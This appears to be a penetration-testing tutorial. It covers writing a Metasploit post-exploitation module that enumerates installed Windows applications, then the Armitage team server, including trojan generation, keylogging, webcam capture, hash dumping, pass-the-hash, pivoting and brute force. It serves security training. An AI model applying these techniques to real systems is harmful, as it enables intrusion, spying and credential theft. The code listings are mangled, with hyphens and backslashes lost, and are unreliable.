Description’ => %q{ This module will enumerate all installed applications },

License’ => MSF_LICENSE,

Platform’ => [ ‘windows’ ],

SessionTypes’ => [ ‘meterpreter’ ]

))

end

The script starts with including the metasploit core libraries. Then we build up the class that extends the properties of Msf::Post modules.

Next we create the initialize function which is used to initialize and define the module properties and description. This basic structure remains the same in almost all modules. Now our next step will be to create a table that can display our extracted result. We have a special library Rex::Ui::Text which can be used for this task. We will have to define different columns (Listing 10).

Listing 10. Defining different columns

def app_list

tbl = Rex::Ui::Text::Table.new(

Header’ => “Installed Applications”,

Indent’ => 1,

Columns’ =>

[

Name”,

])

appkeys = [

HKLMSOFTWAREMicrosoftWindowsCurrentVersionUninstall’,

HKCUSOFTWAREMicrosoftWindowsCurrentVersionUninstall’,

HKLMSOFTWAREWOW6432NODEMicrosoftWindowsCurrentVersionUninstall’,

HKCUSOFTWAREWOW6432NODEMicrosoftWindowsCurrentVersionUninstall’,

]

apps = []

appkeys.each do |keyx86|

found_keys = registry_enumkeys(keyx86)

if found_keys

found_keys.each do |ak|

apps << keyx86 +”” + ak

end

end

end

The script body starts with building the table and providing different column names. Then a separate array of registry locations is created which will be used to enumerate the application list. The application information is maintained in a separate array named as apps.

Then we start the enumeration process by running a loop that looks into different registry locations stored in appskey array (Listing 11).

Listing 11. The enumeration process

t = []

while(not apps.empty?)

1.upto(16) do

t << framework.threads.spawn(“Module(#{self.refname})”, false, apps.shift) do |k|

begin

dispnm = registry_getvaldata(“#{k}”,”DisplayName”)

dispversion = registry_getvaldata(“#{k}”,”DisplayVersion”)

tbl << [dispnm,dispversion] if dispnm and dispversion

rescue

end

end

The next lines of script populate the table with different values in respective columns. The script uses in-built function registry_getvaldata which fetches the values and add them to the table (Listing 12).

Listing 12. The functions of the script

results = tbl.to_s

print_line(“n” + results + “n”)

p = store_loot(“host.applications”, “text/plain”, session, results, “applications.txt”, “Installed Applications”)

print_status(“Results stored in: #{p}”)

end

def run

print_status(“Enumerating applications installed on #{sysinfo[‘Computer’]}”)

app_list

end

end

The last few lines of the script is used for storing the information in a separate text file called applications.txt. The file is populated by using the store_loot function which stores the complete table in the text file.

Finally an output is displayed on the screen stating that the file has been created and results have been stored in it.

The next step will be to store the complete program in respective directory. You have to makes sure that you choose the correct directory for storing your module. This will help the framework in clearly understanding the utility of module and will maintain a hierarchy.

To identify the location of module storage, there are following points you should look at:

Type of module

Operation performed by the module

Affected software or operating system.

These are a few points to keep in mind before you save any module in any folder. Let us consider our module. This module is a post exploitation module that is used to enumerate a windows operating system and gathers information about the system. So our module should follow this convention for storing.

So our destination folder should be modules/post/windows/gather/.

You can save the module with your desired name and with a .rb extension. Let’s save it as enum_applications.rb.

Making the Module work

Once we have saved the module in its preferred directory, the next step will be to execute it and see if it is working fine.

msf> use post/windows/gather/enum_applications

msf post(enum_applications) > show options

Module options (post/windows/gather/enum_applcations)

Name Current Setting Required Description

SESSION yes The session..

This was a small example of how you can build and add your own module to the framework. You definitely need a sound knowledge of Ruby scripting if you want to build good modules. You can also contribute to the metasploit community by releasing your module and let others benefit from it.

 

How to Use Multiplayer Metasploit with Armitage

How to Use Multiplayer 

Metasploit with Armitage

international-154119_640

Metasploit is a very cool tool to use in your penetration testing: add Armitage for a really good time. Penetration test engagements are more and more often a collaborative effort with teams of talented security practitioners rather than a solo effort.

Armitage is a scriptable red team (that is what the offensive security teams are called) collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

Through one Metasploit/Armitage Server instance, your team can:

Use the same sessions

Share hosts, captured data, and downloaded files

Communicate through a shared event log (very similar to a IRC chat if you are familiar with those)

Run bots to automate red team tasks

What you should know

To get the most of this article you should have a working (and preferably updated) BackTrack 5 R3 system, 32-bit or 64-bit shouldn’t matter but I personally run a 32-bit system in a virtual machine.

This article makes extensive use of the command line so you should preferably be familiar with that. You should also have a workstation that can run the Armitage java GUI, which either can be the BackTrack computer in X-windows or a separate computer running Linux, OSX or Windows which can reach the BackTrack machine via the network.

Armitage’s red team collaboration setup is CPU sensitive and it likes RAM. Make sure you give the virtual machine (or physical machine) at least 1.5GB of RAM to your BackTrack 5 R3 team server.

What you will learn

After reading this article you should know how to run a Armitage server and have several clients connected to it for multiplayer Metasploit, meaning running red teams with more than a single member on the same Metasploit server.

Installation

I will base this article on BackTrack 5 R3, so get that from http://www.backtrack-linux.org/. After you have downloaded and booted it you need to start with connecting it to the network and update Metasploit Framework. The default username/password for BackTrack 5 is ”root” / ”toor”(”root” spelled backwards).

Update BackTrack and Metasploit

Before we begin we should update BackTrack to get the latest fixes by running

# apt-get update

# apt-get dist-upgrade

We should also update the Metasploit Framework by running

# msfupdate

Once that is done we are ready to get Armitage running.

Configuring Armitage

Before you can use Armitage you need to configure it and make sure it is running (and create startup-scripts so it is always started when the system boots up).

To begin with we need a shared secret (also known as a password) that is the gatekeeper between your Armitage server and its clients. Anyone who knows this password can access your server and access the results your have collected, including active sessions. Take care when choosing this password, although for this article I will chose a password that is not considered secure but is easy to read.

Manually start Armitage Teamserver

To manually start Armitage Teamserver you first need to move to the Armitage directory which is (in BackTrack 5 R3) /opt/metasploit/msf3/data/armitage by running:

# cd /opt/metasploit/msf3/data/armitage

And then to start the Armitage Teamserver you need to run ./teamserver <my-ip-address> <password> like this:

# ./teamserver 172.16.109.130 MySecretPassword

Creating start-up scripts for Armitage

To start the Armitage Team Server for true multi-player Metasploit you need to create a startup script. As of this moment the correct way to start a Armitage team server on BackTrack 5 R3 is like this: Listing 1.

Listing 1a. Updating the Metasploit Framework

#! /bin/sh

### BEGIN INIT INFO

# Provides: armitage-teamserver

# Required-Start:

# Required-Stop:

# Default-Start: 2 3 4 5

# Default-Stop: 0 1 6

# Short-Description: Armitage TeamServer

# Description: Armitage TeamServer for true Multiplayer Metasploit

#

### END INIT INFO

# Author: Michael Boman <michael@michaelboman.org>

#

PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/local/bin

DESC=”Armitage TeamServer”

NAME=teamserver

ARMITAGE_DIR=/opt/metasploit/msf3/data/armitage

DAEMON=$ARMITAGE_DIR/$NAME

DAEMON_ARGS=”172.16.109.130 MySecretPassword”

PIDFILE=/var/run/$NAME.pid

SCRIPTNAME=/etc/init.d/$NAME

# Exit if the package is not installed

[x “$DAEMON” ] || exit 0

# Read configuration variable file if it is present

[r /etc/default/$NAME ] && . /etc/default/$NAME

# Load the VERBOSE setting and other rcS variables

. /lib/init/vars.sh

# Define LSB log_* functions.

# Depend on lsb-base (>= 3.0-6) to ensure that this file is present.

. /lib/lsb/initfunctions

#

# Function that starts the daemon/service

#

do_start()

{

# Return

# 0 if daemon has been started

# 1 if daemon was already running

# 2 if daemon could not be started

startstopdaemonstartquietpidfile $PIDFILEexec $DAEMONchdir $ARMITAGE_DIRtest > /dev/null

|| return 1

startstopdaemonstartquietpidfile $PIDFILEexec $DAEMONchdir

$DAEMON_ARGS

|| return 2

}

#

# Function that stops the daemon/service

#

do_stop()

{

# Return

# 0 if daemon has been stopped

# 1 if daemon was already stopped

# 2 if daemon could not be stopped

# other if a failure occurred

startstopdaemonstopquietretry=TERM/30/KILL/5pidfile $PIDFILEname $NAME

RETVAL=”$?”

[ “$RETVAL” = 2 ] && return 2

# Wait for children to finish too if this is a daemon that forks

# and if the daemon is only ever run from this initscript.

# If the above conditions are not satisfied then add some other code

# that waits for the process to drop all resources that could be

# needed by services started subsequently. A last resort is to

# sleep for some time.

startstopdaemonstopquietoknodoretry=0/30/KILL/5exec $DAEMON

[ “$?” = 2 ] && return 2

# Many daemons don’t delete their pidfiles when they exit.

rmf $PIDFILE

return “$RETVAL”

}

#

# Function that sends a SIGHUP to the daemon/service

#

do_reload() {

#

# If the daemon can reload its configuration without

# restarting (for example, when it is sent a SIGHUP),

# then implement that here.

#

startstopdaemonstopsignal 1quietpidfile $PIDFILEname $NAME

return 0

}

case “$1” in

start)

[ “$VERBOSE” != no ] && log_daemon_msg “Starting $DESC” “$NAME”

do_start

case “$?” in

0|1) [ “$VERBOSE” != no ] && log_end_msg 0 ;;

2) [ “$VERBOSE” != no ] && log_end_msg 1 ;;

;;

stop)

[ “$VERBOSE” != no ] && log_daemon_msg “Stopping $DESC” “$NAME”

do_stop

case “$?” in

0|1) [ “$VERBOSE” != no ] && log_end_msg 0 ;;

2) [ “$VERBOSE” != no ] && log_end_msg 1 ;;

esac

;;

status)

status_of_proc “$DAEMON” “$NAME” && exit 0 || exit $?

;;

#reload|force-reload)

#

# If do_reload() is not implemented then leave this commented out

# and leave ‘force-reload’ as an alias for ‘restart’.

#

#log_daemon_msg “Reloading $DESC” “$NAME”

#do_reload

#log_end_msg $?

#;;

restart|forcereload)

#

# If the “reload” option is implemented then remove the

# ‘force-reload’ alias

#

log_daemon_msg “Restarting $DESC” “$NAME”

do_stop

case “$?” in

0|1)

do_start

case “$?” in

0) log_end_msg 0 ;;

1) log_end_msg 1 ;; # Old process is still running

*) log_end_msg 1 ;; # Failed to start

esac

;;

*)

# Failed to stop

log_end_msg 1

;;

esac

;;

*)

echo “Usage: $SCRIPTNAME {start|stop|status|restart|force-reload}” >&2

exit 3

;;

esac

:

Start Armitage server automatically at boot

Add the Armitage to automatically start at boot with the following command:

# update-rc.d armitage-teamserver defaults

Using Armitage

Connecting Armitage client to the Server.

Using Armitage GUI

The Armitage GUI has three main panels: modules (top to the left), targets (top to the right) and tabs (bottom), which can be resized to your liking.

Modules

The module browser lets you launch a Metasploit auxiliary module, throw an exploit, generate a payload, and run a post-exploitation module. Click through the tree to find the desired module. Double-click the module to open a module launch dialog.

Armitage will configure the module to run against the selected hosts. This works for auxiliary modules, exploits, and post modules.

 multi1

Figure 1. Armitage client connection window

Running a module against multiple hosts is one of the big advantages of Armitage. In the Metasploit console, you must configure and launch an exploit and post modules for each host you’re working with while in the Armitage GUI most of the module settings are already populated.

You can search modules too. Click in the search box below the tree, type a wildcard expression (e.g., ssh_*), and press enter. The module tree will show the search results, expanded for quick viewing. Clear the search box and press enter to restore the module browser to its original state.

Targets – Graph View

The targets panel shows your targets to you. Armitage represents each target as a computer with its IP address and other information about it below the computer. The computer screen shows the operating system the computer is running (Figure 2).

 multi2

Figure 2. Description of the Armitage user interface

A red computer with electrical jolts indicates a compromised host.

A directional green line indicates a pivot from one host to another. Pivoting allows Metasploit to route attacks and scans through intermediate hosts. A bright green line indicates the pivot communication path is in use.

Click a host to select it. You may select multiple hosts by clicking and dragging a box over the desired hosts.

Right-click a host to bring up a menu with available options. The attached menu will show attack and login options, menus for existing sessions, and options to edit the host information.

The login menu is only available after a port scan reveals open ports that Metasploit can use. The Attack menu is only available after finding attacks through the Attacks menu at the top of Armitage. Shell and Meterpreter menus show up when a shell or Meterpreter session exists on the selected host.

Several keyboard shortcuts are available in the targets panel. To edit these, go to Armitage -> Preferences.

Ctrl Plus – zoom in

Ctrl Minus – zoom out

Ctrl 0 – reset the zoom level

Ctrl A – select all hosts

Escape – clear selection

Ctrl C – arrange hosts into a circle

Ctrl S – arrange hosts into a stack

Ctrl H – arrange hosts into a hierarchy. This only works when a pivot is set up.

Ctrl P – export hosts into an image

Right-click the target area with no selected hosts to configure the layout and zoom level of the target area.

Targets – Table View

If you have a lot of hosts, the graph view becomes difficult to work with. For this situation Armitage has a table view. Go to Armitage -> Set Target View -> Table View to switch to this mode. Armitage will remember your preference (Figure 3).

 multi3

Figure 3. Your preferences stored in Armitage

Click any of the table headers to sort the hosts. Highlight a row and right-click it to bring up a menu with options for that host.

Armitage will highlight the IP address of any host with sessions. If a pivot is in use, Armitage will make it bold as well.

Tabs

Armitage opens each dialog, console, and table in a tab below the module and target panels. Click the X button to close a tab.

You may right-click the X button to open a tab in a window, take a screenshot of a tab, or close all tabs with the same name (Figure 4).

multi4

Figure 4. Tabs management

Hold shift and click X to close all tabs with the same name. Hold shift + control and click X to open the tab in its own window.

You may drag and drop tabs to change their order.

Armitage provides several keyboard shortcuts to make your tab management experience as enjoyable as possible. Use Ctrl+T to take a screenshot of the active tab. Use Ctrl+D to close the active tab. Try Ctrl+Left and Ctrl+Right to quickly switch tabs. And Ctrl+W to open the current tab in its own window.

Consoles

Metasploit console, Meterpreter console, and shell interfaces each use a console tab. A console tab lets you interact with these interfaces through Armitage.

The console tab tracks your command history. Use the up arrow to cycle through previously typed commands. The down arrow moves back to the last command you typed.

In the Metasploit console, use the Tab key to complete commands and parameters. This works just like the Metasploit console outside of Armitage.

Use Ctrl Plus to make the console font size larger, Ctrl Minus to make it smaller, and Ctrl 0 to reset it. This change is local to the current console only. Visit Armitage -> Preferences to permanently change the font.

Press Ctrl F to show a panel that will let you search for text within the console.

 

Use Ctrl A to select all text in the console’s buffer. Armitage sends a use or a set PAYLOAD command if you click a module or a payload name in a console.

To open a Console go to View -> Console or press Ctrl+N.

On MacOS X and Windows, you must click in the edit box at the bottom of the console to type. Linux doesn’t have this problem. Always remember, the best Armitage experience is on Linux.

The Armitage console uses color to draw your attention to some information. To disable the colors, set the console.show_colors.boolean preference to false. You may also edit the colors through Armitage -> Preferences. Here is the Armitage color palette and the preference associated with each color: Figure 5.

multi5

Figure 5. Armitage color palette

Logging

Armitage logs all console, shell, and event log output for you. Armitage organizes these logs by date and host. You’ll find these logs in the ~/.armitage folder. Go to View -> Reporting -> Acitivity Logs to open this folder.

Armitage also saves copies of screenshots and webcam shots to this folder.

Change the armitage log_everything boolean preference key to false to disable this feature.

Edit the armitage log_data_here folder to set the folder where Armitage should log everything to.

Export Data

Armitage and Metasploit share a database to track your hosts, services, vulnerabilities, credentials, loots, and user-agent strings captured by browser exploit modules.

To get this data, go to View -> Reporting -> Export Data. This option will export data from Metasploit and create easily parsable XML and tab separated value (TSV) files.

Host Management

Dynamic Workspaces

Armitage’s dynamic workspaces feature allows you to create views into the hosts’ database and quickly switch between them. Use Workspaces -> Manage to manage your dynamic workspaces. Here you may add, edit and remove workspaces you create (Figure 6).

multi6

Figure 6. Managing your dynamic workspaces

To create a new dynamic workspace, press Add. You will see the following dialog: Figure 7.

multi7

Figure 7. Creating a new dynamic workspace

Give your dynamic workspace a name. It doesn’t matter what you call it. This description is for you.

If you’d like to limit your workspace to hosts from a certain network, type a network description in the Hosts field. A network description might be: 10.10.0.0/16 to display hosts between 10.10.0.0-10.10.255.255. Separate multiple networks with a comma and a space.

You can cheat with the network descriptions a little. If you type: 192.168.95.0, Armitage will assume you mean 192.168.95.0-255. If you type: 192.168.0.0, Armitage will assume you mean 192.168.0.0-192.168.255.255.

Fill out the Ports field to include hosts with certain services. Separate multiple ports using a comma and a space.

Use the OS field to specify which operating system you’d like to see in this workspace. You may type a partial name, such as “indows”. Armitage will only include hosts whose OS name includes the partial name. This value is not case sensitive. Separate multiple operating systems with a comma and a space.

Select Hosts with sessions only to only include hosts with sessions in this dynamic workspace.

You may specify any combination of these items when you create your dynamic workspace.

Each workspace will have an item in the Workspaces menu. Use these menu items to switch between workspaces. You may also use Ctrl+1 through Ctrl+9 to switch between your first nine workspaces.

Use Workspaces -> Show All or Ctrl+Backspace to display the entire database.

Armitage will only display 512 hosts at any given time, no matter how many hosts are in the database. If you have thousands of hosts, use this feature to segment your hosts into useful target sets.

Importing Hosts

To add host information to Metasploit, you may import it. The Hosts -> Import Hosts menu accepts the following files:

Acunetix XML

Amap Log

Amap Log -m

Appscan XML

Burp Session XML

Foundstone XML

IP360 ASPL

IP360 XML v3

Microsoft Baseline Security Analyzer

Nessus NBE

Nessus XML (v1 and v2)

NetSparker XML

NeXpose Simple XML

NeXpose XML Report

Nmap XML

OpenVAS Report

Qualys Asset XML

Qualys Scan XML

Retina XML

You may manually add hosts with Hosts -> Add Hosts.

NMap Scans

You may also launch an NMap scan from Armitage and automatically import the results into Metasploit. The Hosts ->NMap Scan menu has several scanning options.

Optionally, you may type db_nmap in a console to launch NMap with the options you choose.

NMap scans do not use the pivots you have set up.

MSF Scans

Armitage bundles several Metasploit scans into one feature called MSF Scans. This feature will scan for a handful of open ports. It then enumerates several common services using Metasploit auxiliary modules built for the purpose.

Highlight one or more hosts, right-click, and click Scan to launch this feature. You may also go to Hosts -> MSF Scans to launch these as well.

These scans work through a pivot and against IPv6 hosts as well. These scans do not attempt to discover if a host is alive before scanning. To save time, you should do host discovery first (e.g. an ARP scan, ping sweep, or DNS enumeration) and then launch these scans to enumerate the discovered hosts.

DNS Enumeration

Another host discovery option is to enumerate a DNS server. Go to Hosts -> DNS Enum to do this. Armitage will present a module launcher dialog with several options. You will need to set the DOMAIN option to the domain you want to enumerate. You may also want to set NS to the IP address of the DNS server you’re enumerating.

If you’re attacking an IPv6 network, DNS enumeration is one option to discover the IPv6 hosts on the network.

Database Maintenance

Metasploit logs everything you do to a database. Over time your database will become full of stuff. If you have a performance problem with Armitage, try clearing your database. To do this, go to Hosts -> Clear Database.

Exploitation

Remote Exploits

Before you can attack, you must choose your weapon. Armitage makes this process easy. Use Attacks -> Find Attacks to generate a custom Attack menu for each host. To exploit a host: right-click it, navigate to Attack, and choose an exploit. To show the right attacks, make sure the operating system is set for the host.

The Attack menu limits itself to exploits that meet a minimum exploit rank of great. Some useful exploits are ranked good and they won’t show in the attack menu. You can launch these using the module browser.

Use Armitage -> Set Exploit Rank to change the minimum exploit rank.

Optionally, if you’d like to see hosts that are vulnerable to a certain exploit, browse to the exploit in the module browser. Right-click the module. Select Relevant Targets. Armitage will create a dynamic workspace that shows hosts that match the highlighted exploit. Highlight all of the hosts and double-click the exploit module to attack all of them at once.

Which exploit?

Learning which exploits to use and when comes with experience. Some exploits in Metasploit implement a check function. These check functions connect to a host and check if the exploit applies. Armitage can use these check functions to help you choose the right exploit when there are many options. For example, targets listening on port 80 will show several web application exploits after you use Find Attacks. Click the Check exploits menu to run the check command against each of these. Once all the checks are complete, press Ctrl F and search for vulnerable hosts. This will lead you to the right exploit (Figure 8).

multi8

Figure 8. Finding the right exploit

Clicking a host and selecting Services is another way to find an exploit. If you have NMap scan results, look at the information field and guess which server software is in use. Use the module browser to search for any Metasploit modules related to that software. One module may help you find information required by another exploit. Apache Tomcat is an example of this. The tomcat_mgr_login module will search for a username and password that you can use. Once you have this, you can launch the tomcat_mgr_deploy exploit to get a shell on the host.

Launching Exploits

Armitage uses this dialog to launch exploits: Figure 9.

multi9

Figure 9. Launching exploits

The exploit launch dialog lets you configure options for a module and choose whether to use a reverse connect payload.

Armitage presents options in a table. Double-click the value to edit it. If an option requires a filename, double-click the option to open up a file chooser dialog. You may also check Show advanced options to view and set advanced options.

If you see SOMETHING + in a table, this means you can double-click that item to launch a dialog to help you configure its value. This convention applies to the module launcher and preferences dialogs.

Some penetration testers organize their targets into text files to make them easier to track. Armitage can make use of these files too. Double-click RHOST + and select your targets file. The file must contain one IP address per line. This is an easy way to launch an attack or action against all of those hosts.

For remote exploits, Armitage chooses your payload for you. Generally, Armitage will use Meterpreter for Windows targets and a command shell payload for UNIX targets.

Click Launch to run the exploit. If the exploit is successful, Armitage will make the host red and surround it with lightning bolts. Metasploit will also print a message to any open consoles.

Automatic Exploitation

If manual exploitation fails, you have the hail mary option. Attacks -> Hail Mary launches this feature. Armitage’s Hail Mary feature is a smart db_autopwn. It finds exploits relevant to your targets, filters the exploits using known information, and then sorts them into an optimal order.

This feature won’t find every possible shell, but it’s a good option if you don’t know what else to try.

Client-side Exploits

Through Armitage, you may use Metasploit’s client-side exploits. A client-side attack is one that attacks an application and not a remote service. If you can’t get a remote exploit to work, you’ll have to use a client-side attack.

Use the module browser to find and launch client-side exploits. Search for fileformat to find exploits that trigger when a user opens a malicious file. Search for browser to find exploits that server browser attacks from a web server built into Metasploit.

Client-side Exploits and Payloads

If you launch an individual client-side exploit, you have the option of customizing the payload that goes with it. Armitage picks same defaults for you.

In a penetration test, it’s usually easy to get someone to run your evil package. The hard part is to get past network devices that limit outgoing traffic. For these situations, it helps to know about meterpreter’s payload communication options. There are payloads that speak HTTP, HTTPS, and even communicate to IPv6 hosts. These payloads give you options in a tough egress situation.

To set the payload, double-click PAYLOAD in the option column of the module launcher. This will open a dialog asking you to choose a payload (Figure 10).

multi10

Figure 10. Choosing a payload

Highlight a payload and click Select. Armitage will update the PAYLOAD, DisablePayloadHandler, ExitOnSession,LHOST, and LPORT values for you. You’re welcome to edit these values as you see fit.

If you select the Start a handler for this payload option, Armitage will set the payload options to launch a payload handler when the exploit launches. If you did not select this value, you’re responsible for setting up a multi/handler for the payload.

Payload Handlers

A payload handler is a server that runs in Metasploit. Its job is to wait for a payload to connect to your Metasploit and establish a session.

To quickly start a payload handler, navigate to Armitage -> Listeners. A bind listener attempts to connect to a payload listening for a connection. A reverse listener waits for the payload to connect back to you.

You may set up shell listeners to receive connections from netcat.

Go to View -> Jobs to see which handlers are running.

Generate a Payload

Exploits are great, but don’t ignore the simple stuff. If you can get a target to run a program, then all you need is an executable. Armitage can generate an executable from any of Metasploit’s payloads. Choose a payload in the module browser, double-click it, select the type of output, and set your options. Once you click launch, a save dialog will ask you where to save the file to (Figure 11).

 multi11

Figure 11. Saving the file

To create a Windows trojan binary, set the output type to exe. Set the Template option to a Windows executable. Set KeepTemplateWorking if you’d like the template executable to continue to work as normal. Make sure you test the resulting binary. Some template executables will not yield a working executable.

Remember, if you have a payload, it needs a handler. Use the multi/handler output type to create a handler that waits for the payload to connect. This option offers more flexibility and payload options than the Armitage ->Listeners menu.

If you plan to start a handler and then generate a payload, here’s a tip that will save you some time. First, configure a multi/handler as described. Hold down Shift when you click Launch. This will tell Armitage to keep the module launch dialog open. Once your handler is started, change the output type to the desired value, and click Launch again. This will generate the payload with the same values used to create the multi/handler.

Post Exploitation

Managing Sessions

Armitage makes it easy to manage the meterpreter agent once you successfully exploit a host. Hosts running a meterpreter payload will have a Meterpreter N menu for each Meterpreter session (Figure 12).

multi12

Figure 12. Meterpreter menu

If you have shell access to a host, you will see a Shell N menu for each shell session. Right-click the host to access this menu. If you have a Windows shell session, you may go to Shell N -> Meterpreter to upgrade the session to a Meterpreter session. If you have a UNIX shell, go to Shell N -> Upload to upload a file using the UNIX printf command.

Privilege Escalation

Some exploits result in administrative access to the host. Other times, you need to escalate privileges yourself. To do this, use the Meterpreter N -> Access -> Escalate Privileges menu. This will highlight the privilege escalation modules in the module browser.

Try the getsystem post module against Windows XP/2003 era hosts.

Token Stealing

Another privilege escalation option is token stealing. When a user logs onto a Windows host, a token is generated and acts like a temporary cookie to save the user the trouble of retyping their password when they try to access different resources. Tokens persist until a reboot. You may steal these tokens to assume the rights of that user.

To see which tokens are available to you, go to Meterpreter N -> Access -> Steal Token. Armitage will present a list of tokens to you. Click Steal Token to steal one.

If you want to revert to your original token, press Revert to Self. The Get UID button shows your current user ID.

Session Passing

Once you exploit a host, duplicating your access should be a first priority. Meterpreter N -> Access -> Pass Session will inject meterpreter into memory and execute it for you. By default this option is configured to call back to Armitage’s default Meterpreter listener. Just click Launch.

You may also use Pass Session to send Meterpreter to a friend. Set LPORT and LHOST to the values of their Meterpreter multi/handler.

If your friend uses Armitage, have them type set in a Console tab and report the LHOST and LPORT values to you. These are the values for their default Meterpreter listener.

File Browser

Meterpreter gives you several options for exploring a host once you’ve exploited it. One of them is the file browser. This tool will let you upload, download, and delete files. Visit Meterpreter N -> Explore -> Browse Files to access the File Browser.

Right-click a file to download or delete it. If you want to delete a directory, make sure it’s empty first.

You may download entire folders or individual files. Go to View -> Downloads to access your downloaded files.

If you have system privileges, you may modify the file timestamps using the File Browser. Right-click a file or directory and go to the Timestamp menu. This features works like a clipboard. Use Get MACE Values to capture the timestamps of the current file. Right-click another file and use Set MACE Values to update the timestamps of that file.

Command Shell

You can reach a command shell for a host through Meterpreter N -> Interact -> Command Shell. The Meterpreter shell is also available under the same parent menu.

Navigating to the Meterpreter N menu for each action gets old fast. Right-click inside the Meterpreter shell window to see the Meterpreter N menu items right away.

Close the command shell tab to kill the process associated with the command shell.

VNC

To interact with a desktop on a target host, go to Meterpreter N -> Interact -> Desktop (VNC). This will stage a VNC server into the memory of the current process and tunnel the connection through Meterpreter. Armitage will provide you the details to connect a local VNC client to your target.

Screenshots and Webcam Spying

To grab a screenshot use Meterpreter N -> Explore -> Screenshot. There is a Webcam Shot option in the same location. This option snaps a frame from the user’s webcam.

Right-click a screenshot or webcam shot image to change the zoom for the tab. This zoom preference will stay, even if you refresh the image. Click Refresh to update the screenshot or grab another frame from the webcam. ClickWatch (10s) to automatically snap a picture every ten seconds.

Process Management and Key Logging

Go to Meterpreter N -> Explore -> Show Processes to see a list of processes on your victim. Use Kill to kill the highlighted processes.

Meterpreter runs in memory. It’s possible to move Meterpreter from one process to another. This is called migration. Highlight a process and click Migrate to migrate to another process. Your session will have the permissions of that process.

While in a process, it’s also possible to see keystrokes from the vantage point of that process. Highlight a process and click Log Keystrokes to launch a module that migrates meterpreter and starts capturing keystrokes. If you key log from explorer.exe you will see all of the keys the user types on their desktop.

If you choose to migrate a process for the purpose of key logging, you should duplicate your session first. If the process Meterpreter lives in closes, your session will go away.

Post-exploitation Modules

Metasploit has several post-exploitation modules too. Navigate the post branch in the module browser. Double-click a module and Armitage will show a launch dialog. Armitage will populate the module’s SESSION variable if a compromised host is highlighted. Each post-exploitation module will execute in its own tab and present its output to you there.

To find out which post modules apply for a session: right-click a compromised host and navigate to Meterpreter N ->Explore -> Post Modules or Shell N -> Post Modules. Clicking this menu item will show all applicable post modules in the module browser.

Metasploit saves post-exploitation data into a Loot database. To view this data go to View -> Loot.

You may highlight multiple hosts and Armitage will attempt to run the selected post module against all of them. Armitage will open a new tab for the post module output of each session. This may lead to a lot of tabs. Hold down shift and click X on one of the tabs to close all tabs with the same name.

Maneuver

Pivoting

Metasploit can launch attacks from a compromised host and receive sessions on the same host. This ability is called pivoting.

To create a pivot, go to Meterpreter N -> Pivoting -> Setup…. A dialog will ask you to choose which subnet you want to pivot through the session.

Once you’ve set up pivoting, Armitage will draw a green line from the pivot host to all targets reachable by the pivot you created. The line will become bright green when the pivot is in use.

To use a pivot host for a reverse connection, set the LHOST option in the exploit launch dialog to the IP address of the pivot host.

Scanning and External Tools

Once you accessed a host, it’s good to explore and see what else is on the same network. If you’ve set up pivoting, Metasploit will tunnel TCP connections to eligible hosts through the pivot host. These connections must come from Metasploit.

To find hosts on the same network as a compromised host, right-click the compromised host and go to Meterpreter N-> ARP Scan or Ping Sweep. This will show you which hosts are alive. Highlight the hosts that appear, right-click, and select Scan to scan these hosts using Armitage’s MSF Scan feature. These scans will honor the pivot you set up.

External tools (e.g., nmap) will not use the pivots you’ve set up. You may use your pivots with external tools through a SOCKS proxy though. Go to Armitage -> SOCKS Proxy… to launch the SOCKS proxy server.

The SOCKS4 proxy server is one of the most useful features in Metasploit. Launch this option and you can set up your web browser to connect to websites through Metasploit. This allows you to browse internal sites on a network like you’re local. You may also configure proxychains on Linux to use almost any program through a proxy pivot.

Password Hashes

To collect Windows password hashes, visit Meterpreter N -> Access -> Dump Hashes. You need administrative privileges to do this.

There are two hash dumping options. One is the lsass method and the other is the registry method. The lsass method attempts to grab the password hashes from memory. This option works well against Windows XP/2003 era hosts. The registry method works well against modern Windows systems.

You may view collected hashes through View -> Credentials. For your cracking pleasure, the Export button in this tab will export credentials in pwdump format. You may also use the Crack Passwords button to run John the Ripper against the hashes in the credentials database.

Pass-the-Hash

When you login to a Windows host, your password is hashed and compared to a stored hash of your password. If they match, you’re in. When you attempt to access a resource on the same Windows domain, the stored hash is sent to the other host and used to authenticate you. With access to these hashes, you can use this mechanism to take over other hosts on the same domain. This is called a pass-the-hash attack.

Use Login -> psexec to attempt a pass-the-hash attack against another Windows host. Click Check all Credentials to have Armitage try all hashes and credentials against the host.

The pass-the-hash attack attempts to upload a file and create a service that immediately runs. Only administrator users can do this. Further, your targets must be on the same active directory domain for this attack to work.

Using Credentials

Armitage will create a Login menu on each host with known services. Right-click a host and navigate to Login ->service. This will open a dialog where you may choose a username and password from the credentials known to Metasploit.

Some services (e.g. telnet and ssh) will give you a session when a login succeeds. Others will not.

Check the Try all credentials option and Metasploit will login to the service with each of the known credentials. Metasploit automatically adds each successful login to the credentials table for you.

The best way into a network is through valid credentials. Remember that a successful username/password combination from one service may give you access to another host that you couldn’t exploit.

Password Brute Force

Metasploit can attempt to guess a username and password for a service for you. This capability is easy to use through the module browser.

Metasploit supports brute forcing through the auxiliary modules named service_login. Type login in the module browser to search for them.

To brute force a username and password over SSH, browse to auxiliary/scanner/ssh/ssh_login in the modules panel and double-click it.

If you know the username, set the USERNAME variable. If you’d like Metasploit to brute force the username, select a value for USER_FILE. Double-click the USER_FILE variable to bring up a file chooser where you can select a text file containing a list of usernames.

Metasploit has many files related to brute forcing in the [metasploit install]/data/wordlists directory.

Set the PASS_FILE variable to a text file containing a list of passwords to try.

If you’re only brute forcing one host and you have a lot of usernames/passwords to try, I recommend using an external tool like Hydra. Metasploit does not make several parallel connections to a single host to speed up the process. This lesson can be taken one step further – use the right tool for each job.

Remote Metasploit

Remote Connections

You can use Armitage to connect to an existing Metasploit instance on another host. Working with a remote Metasploit instance is similar to working with a local instance. Some Armitage features require read and write access to local files to work. Armitage’s deconfliction server adds these features and makes it possible for Armitage clients to use Metaspoit remotely.

Connecting to a remote Metasploit requires starting a Metasploit RPC server and Armitage’s deconfliction server. With these two servers set up, your use of Metasploit will look like this diagram: Figure 13.

multi13

Figure 13. Your usage of Metasploit with Metasploit RPC server and Armitage’s deconfliction server

Multi-Player Metasploit Setup

The Armitage Linux package comes with a teamserver script that you may use to start Metasploit’s RPC daemon and Armitage’s deconfliction server with one command. To run it:

cd /path/to/metasploit/msf3/data/armitage

./teamserver [external IP address] [password]

This script assumes armitage.jar is in the current folder. Make sure the external IP address is correct (Armitage doesn’t check it) and that your team can reach port 55553 on your attack host. That’s it.

